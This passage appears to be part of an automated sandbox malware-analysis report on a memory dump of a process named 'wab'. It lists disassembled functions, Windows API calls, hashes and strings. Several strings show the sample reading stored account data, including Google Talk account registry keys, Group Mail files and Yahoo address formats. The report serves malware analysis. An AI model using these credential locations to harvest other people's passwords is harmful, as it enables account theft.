                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                  • String ID:
                                                  • API String ID: 2012582556-3916222277
                                                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                  APIs
                                                  • memset.MSVCRT ref: 004037EB
                                                  • memset.MSVCRT ref: 004037FF
                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  • strchr.MSVCRT ref: 0040386E
                                                  • _mbscpy.MSVCRT ref: 0040388B
                                                  • strlen.MSVCRT ref: 00403897
                                                  • sprintf.MSVCRT ref: 004038B7
                                                  • _mbscpy.MSVCRT ref: 004038CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                  • String ID: %s@yahoo.com
                                                  • API String ID: 317221925-3288273942
                                                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                  APIs
                                                  • memset.MSVCRT ref: 00403504
                                                  • memset.MSVCRT ref: 0040351A
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • _mbscpy.MSVCRT ref: 00403555
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 0040356D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                  • API String ID: 3071782539-966475738
                                                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 380 40cd31-40cd57 378->380 379->380 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 380->382 383 40cd59-40cd60 DeleteObject 380->383 383->382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                  • String ID:
                                                  • API String ID: 2054149589-0
                                                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  • memset.MSVCRT ref: 00408620
                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                  • memset.MSVCRT ref: 00408671
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                  Strings
                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                  • String ID: Software\Google\Google Talk\Accounts
                                                  • API String ID: 1366857005-1079885057
                                                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor_mbsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 882979914-1578091866
                                                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                  • memset.MSVCRT ref: 00410E10
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                  • _mbscpy.MSVCRT ref: 00410E87
                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 889583718-2036018995
                                                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004109F7
                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                  • memset.MSVCRT ref: 00410A32
                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                  • String ID:
                                                  • API String ID: 3143880245-0
                                                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                  • String ID: Arial
                                                  • API String ID: 3853255127-493054409
                                                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$_strcmpimemset
                                                  • String ID: /stext
                                                  • API String ID: 520177685-3817206916
                                                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                  • String ID:
                                                  • API String ID: 4165544737-0
                                                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
